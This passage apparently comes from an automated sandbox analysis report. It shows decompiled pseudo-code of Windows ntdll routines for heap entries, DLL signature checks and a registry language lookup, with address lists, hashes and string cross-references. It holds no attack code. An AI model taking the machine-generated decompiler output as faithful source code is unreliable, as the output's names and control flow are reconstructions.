					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E030CB150();
					__eflags =  *0x31b7bc8;
					if(__eflags == 0) {
						E03182073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0318A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x31b8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x31b8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E030EB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0318A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E030EE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                                                                                    0x030eb746
                                                                                                                                                    0x030eb74b
                                                                                                                                                    0x030eb74d
                                                                                                                                                    0x030eb750
                                                                                                                                                    0x030eb755
                                                                                                                                                    0x030eb758
                                                                                                                                                    0x030eb758
                                                                                                                                                    0x030eb75e
                                                                                                                                                    0x030eb763
                                                                                                                                                    0x030eb764
                                                                                                                                                    0x030eb76a
                                                                                                                                                    0x030eb76d
                                                                                                                                                    0x030eb771
                                                                                                                                                    0x030eb776
                                                                                                                                                    0x030eb85c
                                                                                                                                                    0x030eb85d
                                                                                                                                                    0x030eb860
                                                                                                                                                    0x030eb865
                                                                                                                                                    0x03132ba1
                                                                                                                                                    0x03132ba2
                                                                                                                                                    0x03132ba9
                                                                                                                                                    0x03132bae
                                                                                                                                                    0x03132bae
                                                                                                                                                    0x030eb77c
                                                                                                                                                    0x030eb77c
                                                                                                                                                    0x030eb77c
                                                                                                                                                    0x030eb785
                                                                                                                                                    0x030eb788
                                                                                                                                                    0x03132bb6
                                                                                                                                                    0x03132bb9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03132bbf
                                                                                                                                                    0x03132bc5
                                                                                                                                                    0x03132bc9
                                                                                                                                                    0x03132be8
                                                                                                                                                    0x03132bed
                                                                                                                                                    0x03132bcb
                                                                                                                                                    0x03132be0
                                                                                                                                                    0x03132be5
                                                                                                                                                    0x03132bf3
                                                                                                                                                    0x03132bf8
                                                                                                                                                    0x03132bfd
                                                                                                                                                    0x03132c05
                                                                                                                                                    0x03132c0e
                                                                                                                                                    0x03132c0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb78e
                                                                                                                                                    0x030eb78e
                                                                                                                                                    0x030eb78e
                                                                                                                                                    0x030eb791
                                                                                                                                                    0x030eb791
                                                                                                                                                    0x030eb797
                                                                                                                                                    0x030eb797
                                                                                                                                                    0x030eb79f
                                                                                                                                                    0x030eb7a9
                                                                                                                                                    0x030eb7af
                                                                                                                                                    0x030eb7af
                                                                                                                                                    0x030eb7b1
                                                                                                                                                    0x030eb7b6
                                                                                                                                                    0x030eb7e2
                                                                                                                                                    0x030eb7e2
                                                                                                                                                    0x030eb7e7
                                                                                                                                                    0x030eb880
                                                                                                                                                    0x030eb7ed
                                                                                                                                                    0x030eb7ed
                                                                                                                                                    0x030eb7ed
                                                                                                                                                    0x030eb7ef
                                                                                                                                                    0x030eb7f2
                                                                                                                                                    0x030eb7f2
                                                                                                                                                    0x030eb7f5
                                                                                                                                                    0x030eb7fa
                                                                                                                                                    0x03132c2d
                                                                                                                                                    0x03132c2e
                                                                                                                                                    0x03132c39
                                                                                                                                                    0x030eb800
                                                                                                                                                    0x030eb800
                                                                                                                                                    0x030eb802
                                                                                                                                                    0x030eb805
                                                                                                                                                    0x030eb808
                                                                                                                                                    0x030eb808
                                                                                                                                                    0x030eb80a
                                                                                                                                                    0x030eb80d
                                                                                                                                                    0x030eb816
                                                                                                                                                    0x030eb81c
                                                                                                                                                    0x030eb822
                                                                                                                                                    0x030eb82f
                                                                                                                                                    0x030eb88b
                                                                                                                                                    0x030eb892
                                                                                                                                                    0x030eb897
                                                                                                                                                    0x030eb899
                                                                                                                                                    0x030eb89b
                                                                                                                                                    0x030eb89e
                                                                                                                                                    0x030eb8a5
                                                                                                                                                    0x030eb8a8
                                                                                                                                                    0x030eb8aa
                                                                                                                                                    0x030eb8ac
                                                                                                                                                    0x030eb8ac
                                                                                                                                                    0x030eb8aa
                                                                                                                                                    0x030eb892
                                                                                                                                                    0x030eb831
                                                                                                                                                    0x030eb839
                                                                                                                                                    0x030eb83b
                                                                                                                                                    0x030eb83b
                                                                                                                                                    0x030eb844
                                                                                                                                                    0x030eb84b
                                                                                                                                                    0x030eb852
                                                                                                                                                    0x030eb7b8
                                                                                                                                                    0x030eb7ba
                                                                                                                                                    0x030eb7bf
                                                                                                                                                    0x030eb7c4
                                                                                                                                                    0x03132c18
                                                                                                                                                    0x03132c19
                                                                                                                                                    0x03132c23
                                                                                                                                                    0x030eb7ca
                                                                                                                                                    0x030eb7ca
                                                                                                                                                    0x030eb7cc
                                                                                                                                                    0x030eb7cf
                                                                                                                                                    0x030eb7d1
                                                                                                                                                    0x030eb7d1
                                                                                                                                                    0x030eb7d4
                                                                                                                                                    0x030eb7dc
                                                                                                                                                    0x030eb8bb
                                                                                                                                                    0x030eb8bb
                                                                                                                                                    0x030eb8be
                                                                                                                                                    0x030eb8be
                                                                                                                                                    0x030eb8c1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb8c3
                                                                                                                                                    0x030eb8c5
                                                                                                                                                    0x030eb8c7
                                                                                                                                                    0x030eb8e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb8e0
                                                                                                                                                    0x030eb8cc
                                                                                                                                                    0x030eb8cc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb8cc
                                                                                                                                                    0x030eb8d6
                                                                                                                                                    0x030eb8d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb7dc
                                                                                                                                                    0x030eb7b6

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-1334570610
                                                                                                                                                    • Opcode ID: 7eb6757335125a0c68c73459da8552c55976facb219779ca3fccceca1364568f
                                                                                                                                                    • Instruction ID: a8a6a02b192716eb6ff1553eed2f996c57b88d5cb042ec218aa02673a88649c4
                                                                                                                                                    • Opcode Fuzzy Hash: 7eb6757335125a0c68c73459da8552c55976facb219779ca3fccceca1364568f
                                                                                                                                                    • Instruction Fuzzy Hash: B161CD347052419FDB28DF28C580B6ABBE5FF45304F1889AEE84A8F741D730E881CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E030D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E030DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E030CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x31b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03145510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x31b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E030E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E030E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03147016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E030E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E030E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03147016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E030FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E030CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                                                    0x030d7e4c
                                                                                                                                                    0x030d7e50
                                                                                                                                                    0x030d7e55
                                                                                                                                                    0x030d7e58
                                                                                                                                                    0x030d7e5d
                                                                                                                                                    0x030d7e71
                                                                                                                                                    0x030d7f33
                                                                                                                                                    0x030d7e77
                                                                                                                                                    0x030d7e77
                                                                                                                                                    0x030d7e79
                                                                                                                                                    0x030d7e79
                                                                                                                                                    0x030d7e7e
                                                                                                                                                    0x030d7f45
                                                                                                                                                    0x03129848
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129848
                                                                                                                                                    0x030d7f4e
                                                                                                                                                    0x030d7f53
                                                                                                                                                    0x030d7f5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312985a
                                                                                                                                                    0x03129862
                                                                                                                                                    0x03129866
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312986c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312986c
                                                                                                                                                    0x030d7e84
                                                                                                                                                    0x030d7e84
                                                                                                                                                    0x030d7e8d
                                                                                                                                                    0x03129871
                                                                                                                                                    0x030d7eb8
                                                                                                                                                    0x030d7ec0
                                                                                                                                                    0x030d7ec0
                                                                                                                                                    0x030d7e9a
                                                                                                                                                    0x0312987e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129884
                                                                                                                                                    0x0312988b
                                                                                                                                                    0x031298a7
                                                                                                                                                    0x031298ac
                                                                                                                                                    0x031298b1
                                                                                                                                                    0x031298b6
                                                                                                                                                    0x031298b8
                                                                                                                                                    0x031298b8
                                                                                                                                                    0x031298b9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031298b9
                                                                                                                                                    0x030d7ea0
                                                                                                                                                    0x030d7ea7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d7eac
                                                                                                                                                    0x030d7eb1
                                                                                                                                                    0x030d7ec6
                                                                                                                                                    0x030d7ed0
                                                                                                                                                    0x031298cc
                                                                                                                                                    0x030d7ed6
                                                                                                                                                    0x030d7ed6
                                                                                                                                                    0x030d7ed6
                                                                                                                                                    0x030d7ede
                                                                                                                                                    0x030d7ee3
                                                                                                                                                    0x031298e3
                                                                                                                                                    0x031298f0
                                                                                                                                                    0x03129902
                                                                                                                                                    0x031298f2
                                                                                                                                                    0x031298fb
                                                                                                                                                    0x031298fb
                                                                                                                                                    0x03129907
                                                                                                                                                    0x0312991d
                                                                                                                                                    0x0312991d
                                                                                                                                                    0x03129907
                                                                                                                                                    0x031298e3
                                                                                                                                                    0x030d7ef0
                                                                                                                                                    0x030d7f14
                                                                                                                                                    0x030d7f14
                                                                                                                                                    0x030d7f1e
                                                                                                                                                    0x03129946
                                                                                                                                                    0x030d7f24
                                                                                                                                                    0x030d7f24
                                                                                                                                                    0x030d7f24
                                                                                                                                                    0x030d7f2c
                                                                                                                                                    0x0312996a
                                                                                                                                                    0x03129975
                                                                                                                                                    0x03129975
                                                                                                                                                    0x0312997e
                                                                                                                                                    0x03129993
                                                                                                                                                    0x03129993
                                                                                                                                                    0x0312997e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d7ef2
                                                                                                                                                    0x030d7efc
                                                                                                                                                    0x030d7f0a
                                                                                                                                                    0x030d7f0e
                                                                                                                                                    0x03129933
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129933
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d7f0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d7eb1

                                                                                                                                                    Strings
                                                                                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 03129891
                                                                                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 031298A2
                                                                                                                                                    • LdrpCompleteMapModule, xrefs: 03129898
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                    • API String ID: 0-1676968949
                                                                                                                                                    • Opcode ID: 441bbd8f0a5c765ca514167994cbc912de99383e9d2936d6bdd2d2ed5e5da5c4
                                                                                                                                                    • Instruction ID: 14659ded74f7d628000921405c3e70b3b4f6073eaad12ca5414631166ff427a9
                                                                                                                                                    • Opcode Fuzzy Hash: 441bbd8f0a5c765ca514167994cbc912de99383e9d2936d6bdd2d2ed5e5da5c4
                                                                                                                                                    • Instruction Fuzzy Hash: C9510235A067449FDB25CF6CC944B6ABBE4EF49B20F0806A9E8519B7E1D730ED10CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E030CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E030CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E031095D0();
						}
						if(_t78 != 0) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0310FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0310BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03109600();
					if(_t97 < 0) {
						goto L6;
					}
					E0310BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L030CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0310BB40(_t83, _t102 + 0x24, _t78);
								if(L030D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0310BB40(_t84, _t102 + 0x24, _t94);
									if(L030D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                                                    0x030ce620
                                                                                                                                                    0x030ce628
                                                                                                                                                    0x030ce62f
                                                                                                                                                    0x030ce631
                                                                                                                                                    0x030ce635
                                                                                                                                                    0x030ce637
                                                                                                                                                    0x030ce63e
                                                                                                                                                    0x03125503
                                                                                                                                                    0x03125503
                                                                                                                                                    0x030ce64c
                                                                                                                                                    0x030ce64c
                                                                                                                                                    0x030ce651
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ce661
                                                                                                                                                    0x030ce665
                                                                                                                                                    0x0312542a
                                                                                                                                                    0x030ce715
                                                                                                                                                    0x030ce71a
                                                                                                                                                    0x030ce71c
                                                                                                                                                    0x030ce720
                                                                                                                                                    0x030ce720
                                                                                                                                                    0x030ce727
                                                                                                                                                    0x030ce736
                                                                                                                                                    0x030ce736
                                                                                                                                                    0x030ce743
                                                                                                                                                    0x030ce743
                                                                                                                                                    0x030ce673
                                                                                                                                                    0x030ce678
                                                                                                                                                    0x030ce67d
                                                                                                                                                    0x030ce682
                                                                                                                                                    0x030ce685
                                                                                                                                                    0x030ce692
                                                                                                                                                    0x030ce69b
                                                                                                                                                    0x030ce6a3
                                                                                                                                                    0x030ce6ad
                                                                                                                                                    0x030ce6b1
                                                                                                                                                    0x030ce6b2
                                                                                                                                                    0x030ce6bb
                                                                                                                                                    0x030ce6bf
                                                                                                                                                    0x030ce6c0
                                                                                                                                                    0x030ce6c8
                                                                                                                                                    0x030ce6cc
                                                                                                                                                    0x030ce6d5
                                                                                                                                                    0x030ce6d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ce6e5
                                                                                                                                                    0x030ce6ea
                                                                                                                                                    0x030ce6f9
                                                                                                                                                    0x030ce70b
                                                                                                                                                    0x030ce70f
                                                                                                                                                    0x03125439
                                                                                                                                                    0x0312545e
                                                                                                                                                    0x0312545e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312545e
                                                                                                                                                    0x0312543b
                                                                                                                                                    0x0312543e
                                                                                                                                                    0x03125440
                                                                                                                                                    0x03125445
                                                                                                                                                    0x03125472
                                                                                                                                                    0x03125475
                                                                                                                                                    0x0312548d
                                                                                                                                                    0x03125493
                                                                                                                                                    0x031254a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031254ab
                                                                                                                                                    0x031254b4
                                                                                                                                                    0x031254bc
                                                                                                                                                    0x031254c8
                                                                                                                                                    0x031254de
                                                                                                                                                    0x031254fb
                                                                                                                                                    0x031254e0
                                                                                                                                                    0x031254e6
                                                                                                                                                    0x031254eb
                                                                                                                                                    0x031254eb
                                                                                                                                                    0x031254de
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031254bc
                                                                                                                                                    0x03125477
                                                                                                                                                    0x0312547a
                                                                                                                                                    0x03125480
                                                                                                                                                    0x03125483
                                                                                                                                                    0x03125486
                                                                                                                                                    0x0312548b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312548b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03125447
                                                                                                                                                    0x03125447
                                                                                                                                                    0x03125447
                                                                                                                                                    0x03125447
                                                                                                                                                    0x0312544e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03125450
                                                                                                                                                    0x03125452
                                                                                                                                                    0x03125455
                                                                                                                                                    0x0312545a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312545c
                                                                                                                                                    0x0312546a
                                                                                                                                                    0x0312546d
                                                                                                                                                    0x0312546f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312546f
                                                                                                                                                    0x030ce70f

                                                                                                                                                    Strings
                                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 030CE68C
                                                                                                                                                    • @, xrefs: 030CE6C0
                                                                                                                                                    • InstallLanguageFallback, xrefs: 030CE6DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                    • API String ID: 0-1757540487
                                                                                                                                                    • Opcode ID: eba8ae747aba77e623ae05b51df20647b48661b17b703f81622377381789e302
                                                                                                                                                    • Instruction ID: 8cc3f9a6eacc73cbf758b17d1efebff1dac43780f7058f75740228324ebc821e
                                                                                                                                                    • Opcode Fuzzy Hash: eba8ae747aba77e623ae05b51df20647b48661b17b703f81622377381789e302
                                                                                                                                                    • Instruction Fuzzy Hash: 1351ED765193919BC710DF25C480AAFF7E9AF8D615F08092EF989EB240FB34D904C7A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EB8E4, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                    			E030EB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x31b8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E030CB150();
						} else {
							E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E030CB150();
						__eflags =  *0x31b7bc8;
						if(__eflags == 0) {
							E03182073(_t27, 1, _t39, __eflags);
						}
					}
				}
